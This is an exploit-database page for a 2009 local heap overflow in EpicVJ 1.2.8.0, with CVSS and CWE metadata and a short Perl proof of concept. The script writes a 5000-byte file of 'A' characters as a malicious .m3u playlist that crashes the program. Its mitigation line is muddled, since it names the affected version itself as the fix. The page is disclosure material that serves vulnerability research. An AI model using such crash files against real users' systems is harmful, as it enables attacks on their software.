header-logo
Suggest Exploit
vendor:
EpicVJ
by:
HACK4LOVE
7,8
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: EpicVJ
Affected Version From: 1.2.8.0
Affected Version To: 1.2.8.0
Patch Exists: Yes
Related CWE: N/A
CPE: epicvj
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

EpicVJ 1.2.8.0 (.mpl / .m3u ) Local heap Overflow PoC

EpicVJ 1.2.8.0 is vulnerable to a local heap overflow vulnerability when a specially crafted .mpl or .m3u file is opened. This can lead to arbitrary code execution.

Mitigation:

Upgrade to the latest version of EpicVJ 1.2.8.0 or later.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# EpicVJ 1.2.8.0 (.mpl / .m3u ) Local heap Overflow PoC
# http://www.epicdjsoftware.com/
########################################################################################
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-07-20]

Navigation

Suggest Exploit

Services By CQR